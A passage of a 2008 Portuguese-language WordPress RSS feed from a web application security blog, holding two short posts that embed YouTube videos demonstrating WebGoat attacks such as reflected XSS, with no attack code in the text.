		<media:content url="http://webappsecurity.files.wordpress.com/2008/06/imagem2.png?w=150" medium="image">
			<media:title type="html">imagem2</media:title>
		</media:content>
	</item>
		<item>
		<title>Reflected XSS</title>
		<link>http://webappsecurity.wordpress.com/2008/05/27/reflected-xss/</link>
		<comments>http://webappsecurity.wordpress.com/2008/05/27/reflected-xss/#comments</comments>
		<pubDate>Tue, 27 May 2008 04:06:07 +0000</pubDate>
		<dc:creator>webappsecurity</dc:creator>
				<category><![CDATA[videos]]></category>
		<category><![CDATA[websecurity]]></category>
		<category><![CDATA[webgoat]]></category>

		<guid isPermaLink="false">http://webappsecurity.wordpress.com/?p=4</guid>
		<description><![CDATA[Esse e&#8217; mais um video usando o webgoat pra mostrar como fazer alguns ataques, todos os videos que estou fazendo serao mostrados no FGSL agora no dia 31 de maio na faculdade senac Bom ainda estao sem narracao mas a ideia e que venham a ter   Abracos e ate&#8217; algum post descente<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=webappsecurity.wordpress.com&amp;blog=3814187&amp;post=4&amp;subd=webappsecurity&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>Esse e&#8217; mais um video usando o webgoat pra mostrar como fazer alguns ataques, todos os videos que estou fazendo serao mostrados no FGSL agora no dia 31 de maio na faculdade senac <img src='http://s0.wp.com/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>
<p>Bom ainda estao sem narracao mas a ideia e que venham a ter <img src='http://s0.wp.com/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>
<span class='embed-youtube' style='text-align:center; display: block;'><iframe class='youtube-player' type='text/html' width='640' height='390' src='http://www.youtube.com/embed/XBY1lGcOBvE?version=3&amp;rel=1&amp;fs=1&amp;showsearch=0&amp;showinfo=1&amp;iv_load_policy=1&amp;wmode=transparent' frameborder='0'></iframe></span>
<p> </p>
<p>Abracos e ate&#8217; algum post descente <img src='http://s0.wp.com/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>
<br /><img alt="" border="0" src="http://feeds.wordpress.com/1.0/categories/webappsecurity.wordpress.com/4/" /> <img alt="" border="0" src="http://feeds.wordpress.com/1.0/tags/webappsecurity.wordpress.com/4/" /> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/webappsecurity.wordpress.com/4/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/webappsecurity.wordpress.com/4/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/webappsecurity.wordpress.com/4/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/webappsecurity.wordpress.com/4/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/webappsecurity.wordpress.com/4/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/webappsecurity.wordpress.com/4/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/webappsecurity.wordpress.com/4/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/webappsecurity.wordpress.com/4/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/webappsecurity.wordpress.com/4/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/webappsecurity.wordpress.com/4/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/webappsecurity.wordpress.com/4/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/webappsecurity.wordpress.com/4/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/webappsecurity.wordpress.com/4/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/webappsecurity.wordpress.com/4/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=webappsecurity.wordpress.com&amp;blog=3814187&amp;post=4&amp;subd=webappsecurity&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://webappsecurity.wordpress.com/2008/05/27/reflected-xss/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/db90e4ed73a5b5784d0e283f5ecdae2e?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">webappsecurity</media:title>
		</media:content>
	</item>
		<item>
		<title>Meu primeiro post no meu novo blog :)</title>
		<link>http://webappsecurity.wordpress.com/2008/05/25/meu-primeiro-post-no-meu-novo-blog/</link>
		<comments>http://webappsecurity.wordpress.com/2008/05/25/meu-primeiro-post-no-meu-novo-blog/#comments</comments>
		<pubDate>Sun, 25 May 2008 15:14:32 +0000</pubDate>
		<dc:creator>webappsecurity</dc:creator>
				<category><![CDATA[videos]]></category>
		<category><![CDATA[websecurity]]></category>
		<category><![CDATA[webgoat]]></category>

		<guid isPermaLink="false">http://webappsecurity.wordpress.com/?p=3</guid>
		<description><![CDATA[Bom pessoas estou novamente tentando fazer um blog, agora algo mais especifico sobre seguranca em aplicacao web Bom pro meu primeiro post vai um teste de alguns videos que estou fazendo sobre ataques em aplicacoes web Abracos! ps: Desculpem ainda nao configurei meu teclado novo<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=webappsecurity.wordpress.com&amp;blog=3814187&amp;post=3&amp;subd=webappsecurity&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>Bom pessoas estou novamente tentando fazer um blog, agora algo mais especifico sobre seguranca em aplicacao web <img src='http://s0.wp.com/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>
<p>Bom pro meu primeiro post vai um teste de alguns videos que estou fazendo sobre ataques em aplicacoes web <img src='http://s0.wp.com/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>
<span class='embed-youtube' style='text-align:center; display: block;'><iframe class='youtube-player' type='text/html' width='640' height='390' src='http://www.youtube.com/embed/femI7IMP8hw?version=3&amp;rel=1&amp;fs=1&amp;showsearch=0&amp;showinfo=1&amp;iv_load_policy=1&amp;wmode=transparent' frameborder='0'></iframe></span>
<p>Abracos!</p>
<p>ps: Desculpem ainda nao configurei meu teclado novo <img src='http://s0.wp.com/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>
<br /><img alt="" border="0" src="http://feeds.wordpress.com/1.0/categories/webappsecurity.wordpress.com/3/" /> <img alt="" border="0" src="http://feeds.wordpress.com/1.0/tags/webappsecurity.wordpress.com/3/" /> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/webappsecurity.wordpress.com/3/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/webappsecurity.wordpress.com/3/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/webappsecurity.wordpress.com/3/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/webappsecurity.wordpress.com/3/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/webappsecurity.wordpress.com/3/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/webappsecurity.wordpress.com/3/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/webappsecurity.wordpress.com/3/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/webappsecurity.wordpress.com/3/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/webappsecurity.wordpress.com/3/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/webappsecurity.wordpress.com/3/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/webappsecurity.wordpress.com/3/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/webappsecurity.wordpress.com/3/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/webappsecurity.wordpress.com/3/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/webappsecurity.wordpress.com/3/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=webappsecurity.wordpress.com&amp;blog=3814187&amp;post=3&amp;subd=webappsecurity&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://webappsecurity.wordpress.com/2008/05/25/meu-primeiro-post-no-meu-novo-blog/feed/</wfw:commentRss>
		<slash:comments>4</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/db90e4ed73a5b5784d0e283f5ecdae2e?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">webappsecurity</media:title>
		</media:content>
	</item>
	</channel>
</rss>
